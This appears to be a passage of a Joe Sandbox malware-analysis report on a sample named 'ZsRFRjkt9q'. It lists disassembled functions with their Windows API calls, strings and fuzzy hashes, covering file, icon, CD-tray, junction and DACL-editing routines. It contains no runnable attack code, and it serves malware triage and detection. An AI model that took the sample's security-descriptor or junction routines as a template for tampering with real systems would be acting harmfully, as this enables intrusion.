Function 0044AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 0044AB3D
VariantCopy.OLEAUT32(?,?), ref: 0044AB46
VariantClear.OLEAUT32(?), ref: 0044AB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0044AC40
__swprintf.LIBCMT ref: 0044AC70
VarR8FromDec.OLEAUT32(?,?), ref: 0044AC9C
VariantInit.OLEAUT32(?), ref: 0044AD4D
SysFreeString.OLEAUT32(00000016), ref: 0044ADDF
VariantClear.OLEAUT32(?), ref: 0044AE35
VariantClear.OLEAUT32(?), ref: 0044AE44
VariantInit.OLEAUT32(00000000), ref: 0044AE80

Strings

Default, xrefs: 0044ACFD
%4d%02d%02d%02d%02d%02d, xrefs: 0044AC6A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 1ef3e23069a869df427bada7a0b431b08265a902c8dc5570a096ee9aa8230e50
Instruction ID: b7343743ca07c40412d491ea83dedac3c5837e075b3f85f41d6defa909029fd8
Opcode Fuzzy Hash: 1ef3e23069a869df427bada7a0b431b08265a902c8dc5570a096ee9aa8230e50
Instruction Fuzzy Hash: F7D11671A40205DBEB109F55C885BAEB7B5FF04700F18846BE5059B281DB3CEC66DB9B

Function 0046716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 004671FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00467247

Strings

GETTOTALCOUNT, xrefs: 0046722A
GETSELECTED, xrefs: 0046733F
ISCHECKED, xrefs: 004673B2
GETITEMCOUNT, xrefs: 00467311
UNCHECK, xrefs: 0046740B
EXPAND, xrefs: 004672E1
SELECT, xrefs: 004673E0
COLLAPSE, xrefs: 0046728D
GETTEXT, xrefs: 00467382
EXISTS, xrefs: 004672B0
CHECK, xrefs: 00467267

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
Instruction ID: 62f23ba057e46a8cd31ddd049ddfa486710c51c13ab62974974121bb26b3cf57
Opcode Fuzzy Hash: c43a8db48d506da04349dcc3429b041c4a2109f0e3aab1f999f6c73bd108a0ab
Instruction Fuzzy Hash: 319156742047019BCB04EF21C851A6EB7A1AF54318F10885FFC9667393EB38ED46DB9A

Function 0043CB82 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0043CF50), ref: 0043CE90

Strings

TEXT, xrefs: 0043CDC7
REGEXPCLASS, xrefs: 0043CC56
CLASSNN, xrefs: 0043CC33
P+K, xrefs: 0043CD43
INSTANCE, xrefs: 0043CD9E
CLASS, xrefs: 0043CC10
T+K, xrefs: 0043CD72
NAME, xrefs: 0043CCC2
L+K, xrefs: 0043CD14
H+K, xrefs: 0043CCE8
4+K, xrefs: 0043CC96

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+K$CLASS$CLASSNN$H+K$INSTANCE$L+K$NAME$P+K$REGEXPCLASS$T+K$TEXT
API String ID: 3555792229-3796589855
Opcode ID: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
Instruction ID: 2ed9d666b05899a5a0bbc8a2e6994f38106217aeede367c2b80ce34893bae7f9
Opcode Fuzzy Hash: f5336044610378011e699409c7135cc5052163c0afa7251a4617bbdd594075d5
Instruction Fuzzy Hash: 109176706005069BCB18EF61C4C2BDAFB75BF08304F50952BD859B7291DF38699AD7D8

Function 0046E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0046E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00469808,?), ref: 0046E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0046E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,00469808,?), ref: 0046E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0046E6DF
DestroyCursor.USER32(?), ref: 0046E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0046E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0046E717

Part of subcall function 00420FA7: __wcsicmp_l.LIBCMT ref: 00421030

Strings

.icl, xrefs: 0046E521
.dll, xrefs: 0046E564
.exe, xrefs: 0046E541

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
Instruction ID: 362906a6200e291847826ad6f58851427a409ccbfe03941b9f9efc8c3e9874fa
Opcode Fuzzy Hash: f248247dba35af049fc174e46d4a9f5f6c395263414642daa45a234f2940bab6
Instruction Fuzzy Hash: CC61D171900215FAEB14DF66CC46FBE77E8BB08724F10451BF911E61D1EBB8A980CB68

Function 0044D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

CharLowerBuffW.USER32(?,?), ref: 0044D292
GetDriveTypeW.KERNEL32 ref: 0044D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0044D38C

Strings

wait, xrefs: 0044D349
set cd door , xrefs: 0044D32D
open , xrefs: 0044D2EE
type cdaudio alias cd wait, xrefs: 0044D30A
close cd wait, xrefs: 0044D377
close, xrefs: 0044D298
closed, xrefs: 0044D2A6, 0044D2AF
open, xrefs: 0044D2B9

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: d8839ad3d2d06dc149498d3a141f81d8065c88dc0fc088a9d89c3af58049b518
Instruction ID: c2f07575d900e2cc802aa525a9fa0d83b75d0ad0639a96e5e284e948a2682b64
Opcode Fuzzy Hash: d8839ad3d2d06dc149498d3a141f81d8065c88dc0fc088a9d89c3af58049b518
Instruction Fuzzy Hash: 6F514F715043059FC700EF22D9819AEB7E4FF98718F10896EF88667291DB35EE05CB96

Function 004426BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?), ref: 004426F1
LoadStringW.USER32(00000000,?,00473973,00000016), ref: 004426FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00473973,00000016,0000138C,00000016,?,00000016,0049DDB4,00000000,?,00000016), ref: 0044271C
LoadStringW.USER32(00000000,?,00473973,00000016), ref: 0044271F
__swprintf.LIBCMT ref: 0044276F
__swprintf.LIBCMT ref: 00442780
_wprintf.LIBCMT ref: 00442829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00442840

Strings

^ ERROR, xrefs: 004427D5
Error: , xrefs: 004427F7
Line %d (File "%s"):, xrefs: 00442769
%s (%d) : ==> %s: %s %s, xrefs: 00442824
Line %d:, xrefs: 0044277A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: ff08b60d36110bbdc17b2dae7c2dc98cc04ea29afcc34cebbcfd9309ab3ad4e0
Instruction ID: b3eca28f86436021008a970bdb09a16546556c442e301ca44879bea502f66036
Opcode Fuzzy Hash: ff08b60d36110bbdc17b2dae7c2dc98cc04ea29afcc34cebbcfd9309ab3ad4e0
Instruction Fuzzy Hash: 96413172800118AADB14FBD2DE86EEF7778AF54344F50017AB501760D2EA786F09CBA8

Function 0044D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0044D0D8
__swprintf.LIBCMT ref: 0044D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0044D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0044D15C
_memset.LIBCMT ref: 0044D17B
_wcsncpy.LIBCMT ref: 0044D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0044D1EC
CloseHandle.KERNEL32(00000000), ref: 0044D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0044D200
CloseHandle.KERNEL32(00000000), ref: 0044D20A

Strings

\??\%s, xrefs: 0044D0F4
\, xrefs: 0044D110
:, xrefs: 0044D11B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
Instruction ID: b8dacc7318c57a54b8e1dcc07a6608e13ec8875f8ad1fe94d440b818e94b2f45
Opcode Fuzzy Hash: b68ac97a0bbf8f074f79a283de7a9c19f5e6387d087e4f1df6f20452fc066d1a
Instruction Fuzzy Hash: 1331B871900119ABDB21DFA1DC49FEF77BCEF88740F5040BAF909D11A1E77496458B28

Function 004387CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 0043882D
___wtomb_environ.LIBCMT ref: 0043884F

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__malloc_crt.LIBCMT ref: 00438875
__malloc_crt.LIBCMT ref: 00438892
_free.LIBCMT ref: 004388C9
__recalloc_crt.LIBCMT ref: 00438902
__recalloc_crt.LIBCMT ref: 00438947
_strlen.LIBCMT ref: 00438973
__calloc_crt.LIBCMT ref: 0043897D
_strlen.LIBCMT ref: 0043898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 004389BA
_free.LIBCMT ref: 004389D4
_free.LIBCMT ref: 004389E1
_free.LIBCMT ref: 004389F3
__invoke_watson.LIBCMT ref: 00438A0D

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: 3a6619dcfacbae88ed9764eb458df262e8236fdeef079567c24dfc375283531f
Instruction ID: f8a6bcba9f3a51b7e045a40f257f054e452096192a264bb209ba44541f6a6878
Opcode Fuzzy Hash: 3a6619dcfacbae88ed9764eb458df262e8236fdeef079567c24dfc375283531f
Instruction Fuzzy Hash: 5961E5B2500311EFEB246F26DC41B7AB7A4AF58324F64252FF801AA2D1DF3DD941869D

Function 0046E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0046E754
GetFileSize.KERNEL32(00000000,00000000), ref: 0046E76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 0046E776
CloseHandle.KERNEL32(00000000), ref: 0046E783
GlobalLock.KERNEL32(00000000), ref: 0046E78C
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0046E79B
GlobalUnlock.KERNEL32(00000000), ref: 0046E7A4
CloseHandle.KERNEL32(00000000), ref: 0046E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0046E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0048D9BC,?), ref: 0046E7D5
GlobalFree.KERNEL32(00000000), ref: 0046E7E5
GetObjectW.GDI32(?,00000018,000000FF), ref: 0046E809
CopyImage.USER32(?,00000000,?,?,00002000), ref: 0046E834
DeleteObject.GDI32(00000000), ref: 0046E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0046E872

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
Instruction ID: bbe379a3d369c15808953ba8d2511d5ef9f42df1505e87a7dc6f0ce051fe7f67
Opcode Fuzzy Hash: ee3b4eaa2bb00717be7c8dd40cc1e730c2c539aaab15d6c983e34c33c2c99168
Instruction Fuzzy Hash: E0415975A01208EFDB11AF65CC88EAF7BB8EF89725F104469F906D72A0D7349D41CB25

Function 004505F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0045076F
_wcscat.LIBCMT ref: 00450787
_wcscat.LIBCMT ref: 00450799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004507AE
SetCurrentDirectoryW.KERNEL32(?), ref: 004507C2
GetFileAttributesW.KERNEL32(?), ref: 004507DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 004507F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00450806

Strings

*.*, xrefs: 00450845

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
Instruction ID: 7bdd4fe60b36691808eedc24269dbd53bee5a982b2c8d40390e9c2bde986c826
Opcode Fuzzy Hash: ff5e0aed43fc8de9fb838faa9418ce3fd369cb65696d28d22a61ac5ec733e13f
Instruction Fuzzy Hash: 7D818E755043019FCB24EF24C84596FB3E8BB88305F148C2FFC85D7252EA38E9598B9A

Function 0043A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0043ABD7
Part of subcall function 0043ABBB: GetLastError.KERNEL32(?,0043A69F,?,?,?), ref: 0043ABE1
Part of subcall function 0043ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0043A69F,?,?,?), ref: 0043ABF0
Part of subcall function 0043ABBB: RtlAllocateHeap.KERNEL32(00000000,?,0043A69F,?,?,?), ref: 0043ABF7
Part of subcall function 0043ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043AC0E

Part of subcall function 0043AC56: GetProcessHeap.KERNEL32(00000008,0043A6B5,00000000,00000000,?,0043A6B5,?), ref: 0043AC62
Part of subcall function 0043AC56: RtlAllocateHeap.KERNEL32(00000000,?,0043A6B5,?), ref: 0043AC69
Part of subcall function 0043AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0043A6B5,?), ref: 0043AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0043A8CB
_memset.LIBCMT ref: 0043A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0043A8FF
GetLengthSid.ADVAPI32(?), ref: 0043A910
GetAce.ADVAPI32(?,00000000,?), ref: 0043A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0043A969
GetLengthSid.ADVAPI32(?), ref: 0043A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0043A995
RtlAllocateHeap.KERNEL32(00000000), ref: 0043A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0043A9BD
CopySid.ADVAPI32(00000000), ref: 0043A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0043A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0043AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0043AA2F

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
Instruction ID: a5b523d4b2b3644710638cbaf41432f6dd7c5ae5a535f21993417544a1ff56ad
Opcode Fuzzy Hash: bf7c28dd186497545c2042e8706342816a1cb9ee0fceefb4c30e9748a26ccecd
Instruction Fuzzy Hash: 4D518EB1900209AFCF00DF91DD44EEEBBB9FF09304F04952AF951A7290DB399A15CB65

Function 0044CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0044CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0044CCC5
__swprintf.LIBCMT ref: 0044CD1E
__swprintf.LIBCMT ref: 0044CD37
_wprintf.LIBCMT ref: 0044CDED
_wprintf.LIBCMT ref: 0044CE0B

Strings

"%s" (%d) : ==> %s:, xrefs: 0044CE06
^ ERROR, xrefs: 0044CD8F
Error: , xrefs: 0044CDB5
"%s" (%d) : ==> %s:%s%s, xrefs: 0044CDE8
Line %d (File "%s"):, xrefs: 0044CD18, 0044CD31

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 4d9886d0d9d3ee8179616bb723fcc3339f0dc902fe478c7a0fd9eeeb4d1c7307
Instruction ID: b87f9b5062a23003fa6b05271adbf52b62758fb0d399078fd318079a70c5a6e2
Opcode Fuzzy Hash: 4d9886d0d9d3ee8179616bb723fcc3339f0dc902fe478c7a0fd9eeeb4d1c7307
Instruction Fuzzy Hash: 2B518471900109BADB14EBA1DD82EEEB778AF04304F50017BF505721A2EB386E55DFA8

Function 0044CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0044CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0044CAB0
__swprintf.LIBCMT ref: 0044CB09
__swprintf.LIBCMT ref: 0044CB22
_wprintf.LIBCMT ref: 0044CBCD
_wprintf.LIBCMT ref: 0044CBEB

Strings

"%s" (%d) : ==> %s:, xrefs: 0044CBE6
Error: , xrefs: 0044CB95
"%s" (%d) : ==> %s:%s%s, xrefs: 0044CBC8
Line %d (File "%s"):, xrefs: 0044CB03, 0044CB1C
^ ERROR , xrefs: 0044CB64

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: c48871d0ca1cddcdc6c0a3a223cc982310d100a7272aa04c53813a8c9e32628c
Instruction ID: 0117c1f52f1ff57d1bcb18ef8004b0eea4860d9531de2a50c9a6b6b6bbec22b3
Opcode Fuzzy Hash: c48871d0ca1cddcdc6c0a3a223cc982310d100a7272aa04c53813a8c9e32628c
Instruction Fuzzy Hash: 1D51C371900119AADB14EBE2DD82EEEB778EF04344F50017BB405720A2DB786F59DFA9

Function 00463C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

